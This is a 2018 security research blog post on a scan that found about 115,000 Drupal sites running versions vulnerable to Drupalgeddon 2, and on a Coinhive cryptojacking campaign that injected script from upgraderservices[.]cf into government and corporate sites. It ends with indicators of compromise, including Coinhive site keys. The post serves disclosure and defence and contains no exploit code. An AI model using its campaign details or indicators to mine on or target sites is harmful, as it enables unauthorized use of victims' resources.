Over 100,000 Drupal websites vulnerable to Drupalgeddon 2 (CVE-2018-7600)

In my previous post, I detailed a large cryptojacking campaign that affected hundreds of Drupal websites. Multiple campaigns remain active today and are documented further in the latest SecurityTrails report. An important question was raised during my initial investigation — How many Drupal sites are vulnerable?

To find the answer, I began by looking for sites using Drupal 7. This is the most widely used version, per Drupal’s core statistics. Using the source code search engine PublicWWW, I was able to locate nearly 500,000 websites using Drupal 7. I promptly began scanning all the sites to establish which were vulnerable, and which were not.

I regarded sites that were using at least version 7.58 as not vulnerable to Drupalgeddon 2. This critical flaw is detailed in Drupal security advisory SA-CORE-2018-002 and has been assigned CVE-2018-7600.

Upon completion of the scan I was able to determine:

  • 115,070 sites were outdated and vulnerable.
  • 134,447 sites were not vulnerable.
  • 225,056 sites I could not ascertain the version used.

Pie chart of vulnerable Drupal websites found

Numerous vulnerable sites found in the Alexa Top 1 Million included websites of major educational institutions in the United States and government organizations around the world. Other notable unpatched sites found were of a large television network, a multinational mass media and entertainment conglomerate, and two well-known computer hardware manufacturers.

Due to the highly critical risk of CVE-2018-7600 being exploited, the list of 115,070 vulnerable sites won’t be shared publicly. However, the list of sites has been shared with US-CERT and the Drupal Security Team. If you represent a national CERT/CSIRT and can offer assistance notifying affected organizations, please contact me.

2018-06-07 Update

The Drupal Security Team released a statement regarding my findings that questioned my methodology. While we know 115,000 sites are using outdated Drupal versions, based on the publically accessible CHANGELOG.txt found on each site, it’s possible someone applied a mitigation patch. However, the problem is we have no way of telling if they did — unless we perform the actual exploit.

Unfortunately, attempting the exploit on nearly half a million sites would be highly illegal. Due to this, I won’t be performing the exploit or any variant of it to prove all the sites are vulnerable. The fact remains that each one of the 115,000 sites is using an outdated version Drupal. Using an outdated content management system (CMS) is never best practice.

Another Drupal cryptojacking campaign discovered

While scanning for vulnerable sites, I discovered a new cryptojacking campaign targeting Drupal sites. One of the affected sites was a police department’s website in Belgium. This campaign uses the domain name upgraderservices[.]cf to inject Coinhive.

When the campaign was first discovered, the domain name was using Cloudflare, so the real hosting provider was unknown.

The Coinhive site key used was “ZQXBo9BIgCBhlxCYhc7UAWLJxBfRCVos” however this was later terminated. Because of this, the cryptojacking campaign operator switched to key “0pr13Hw98MvnJ3bJPMUdQyvXvOtOmPZd” and resumed operations on the morning of May 31, 2018.

Twelve hours after my initial report, the malicious code was removed from votrepolice.be and upgraderservices[.]cf was dropped by Cloudflare.

Once this was done, the hosting provider was revealed to be OVH. Simultaneously, the domain’s SSL certificate was switched to LetsEncrypt.

Hundreds of compromised Drupal sites found (again)

To locate compromised sites in this cryptojacking campaign, I scanned the nearly half million Drupal sites for upgraderservices[.]cf. Upon completion, 258 sites were found containing a reference to the malicious domain. I’ve created this spreadsheet listing all of the affected websites.

One of the affected sites in this campaign was the website of the Colorado Attorney General’s office.

Upon the discovery, I reported the site to US-CERT as I previously did for the US federal government sites found in the previous Drupal cryptojacking campaign. An incident number was assigned by the NCCIC Security Operations Center shortly thereafter.

I also setup PRTG monitoring to confirm when the site was remediated. This was done in less than 24 hours after my initial report.

Other websites in the campaign were noticed by Twitter users, including that of a food truck locating service.

Another affected website found was automobile parts manufacturer Magneti Marelli, a subsidiary of Fiat.

One example found in the campaign had upgraded their Drupal version to the latest version without removing the malicious content. As noted by the Drupal Security Team PSA , “simply updating Drupal will not remove backdoors or fix compromised sites” and further remediation steps are necessary.

IoCs

Domain / URLs
upgraderservices[.]cf
upgraderservices[.]cf/drupal.js

Coinhive Site Keys
ZQXBo9BIgCBhlxCYhc7UAWLJxBfRCVos
0pr13Hw98MvnJ3bJPMUdQyvXvOtOmPZd

Closing Remarks

While the amount of vulnerable Drupal websites found is astounding, it’s good to see an even larger share of sites have patched the vulnerability. Hopefully this becomes a trend as more sites continue to be updated.

This latest cryptojacking campaign is yet another example of Drupal websites being exploited on a mass scale. If you’re a website operator using Drupal’s CMS, you need to update to the latest available version ASAP. The Drupal security team has prepared a guide of steps to take if your website has been compromised.

To stop cryptojacking in your browser, I recommend the extension minerBlock. The blocklist provided by CoinBlockerLists is an excellent resource to block coinmining malware and illicit cryptomining operations at the network level.

To learn more about my work and what others are saying about it, please visit this page.

As always, I’m most active on Twitter — follow me @bad_packets

4 Replies to “Over 100,000 Drupal websites vulnerable to Drupalgeddon 2 (CVE-2018-7600)”

Leave a Reply